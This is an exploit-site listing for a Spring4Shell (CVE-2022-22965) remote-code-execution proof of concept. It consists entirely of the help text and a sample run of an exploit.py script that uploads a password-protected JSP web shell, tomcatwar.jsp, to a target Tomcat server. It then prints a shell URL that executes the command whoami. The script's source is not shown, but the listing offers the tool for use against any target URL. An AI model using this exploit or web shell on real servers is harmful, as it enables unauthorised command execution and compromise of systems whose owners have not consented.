## https://sploitus.com/exploit?id=CAD3F237-9F09-5818-ADE3-DF36E8350D41
# Spring4Shell-CVE-2022-22965-POC
```bash
ghost㉿uchiha:~$ ./exploit.py --help
usage: exploit.py [-h] [-f FILENAME] [-p PASSWORD] [-d DIRECTORY] url
Spring4Shell RCE Proof of Concept
positional arguments:
url Target URL
options:
-h, --help show this help message and exit
-f FILENAME, --filename FILENAME
Name of the file to upload (Default tomcatwar.jsp)
-p PASSWORD, --password PASSWORD
Password to protect the shell with (Default: thm)
-d DIRECTORY, --directory DIRECTORY
The upload path for the file (Default: ROOT)
```
## Usage
```bash
ghost㉿uchiha:~$ ./exploit.py http://url/
Shell Uploaded Successfully!
Your shell can be found at: http://url/tomcatwar.jsp?pwd=evil&cmd=whoami
```
Modified version of https://github.com/BobTheShoplifter/Spring4Shell-POC